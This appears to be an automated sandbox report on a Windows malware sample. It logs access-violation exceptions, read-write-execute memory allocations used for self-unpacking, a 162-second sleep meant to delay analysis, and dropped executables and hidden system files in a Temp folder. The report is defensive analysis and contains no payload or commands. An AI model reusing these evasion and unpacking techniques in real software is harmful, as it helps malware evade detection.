__exception__ Oct. 10, 2024, 10:55 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 3033661440	1
__exception__ Oct. 10, 2024, 10:56 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:56 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 816381952	1
__exception__ Oct. 10, 2024, 10:56 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:56 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 1257439232	1
__exception__ Oct. 10, 2024, 10:56 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:56 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 3619880960	1
__exception__ Oct. 10, 2024, 10:57 a.m.	stacktrace: 1+0x7e15 @ 0x407e15 1+0xadf9 @ 0x40adf9 exception.instruction_r: 35 01 00 c0 00 00 00 00 fc 1d 00 00 00 00 00 00 exception.instruction: xor eax, 0xc00001 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x18fe80 registers.esp: 1637440 registers.edi: 72 registers.eax: 4402 registers.ebp: 1638204 registers.edx: 262144 registers.ebx: 2535478 registers.esi: 4294650918 registers.ecx: 4402	1
__exception__ Oct. 10, 2024, 10:57 a.m.	stacktrace: 2+0x2c877 @ 0x42c877 2+0x138d2 @ 0x4138d2 2+0x1eb1ad @ 0x5eb1ad 2+0x7398a @ 0x47398a 0x7efde000 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x202 registers.esp: 1637996 registers.edi: 0 registers.eax: 0 registers.ebp: 1638080 registers.edx: 582600 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 1100218368	1

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1468 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00445000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1519616 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00474000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72811000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72812000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 10, 2024, 10:55 a.m.	process_identifier: 2968 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

QkZoHEBKmB.exe tried to sleep 162 seconds, actually delayed analysis time by 162 seconds

Creates executable files on the filesystem (15 events)

file	C:\Users\test22\AppData\Local\Temp\2.exe
file	C:\Users\test22\AppData\Local\Temp\nseF127.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nsk3167.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nseA8B.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nsq9765.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nsy14AD.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nszFF8E.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nsj2372.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nsbF9C.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nsfBE1C.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nsb1C00.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nsc9EEB.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nsiFAEB.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\nss5B9.tmp\G2DH7W.dll
file	C:\Users\test22\AppData\Local\Temp\1.exe

Creates hidden or system file (13 events)

Time & API	Arguments	Return
NtCreateFile Oct. 10, 2024, 10:55 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:55 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:55 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:55 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:55 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:55 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:55 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:55 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:55 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:56 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:56 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
NtCreateFile Oct. 10, 2024, 10:56 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530
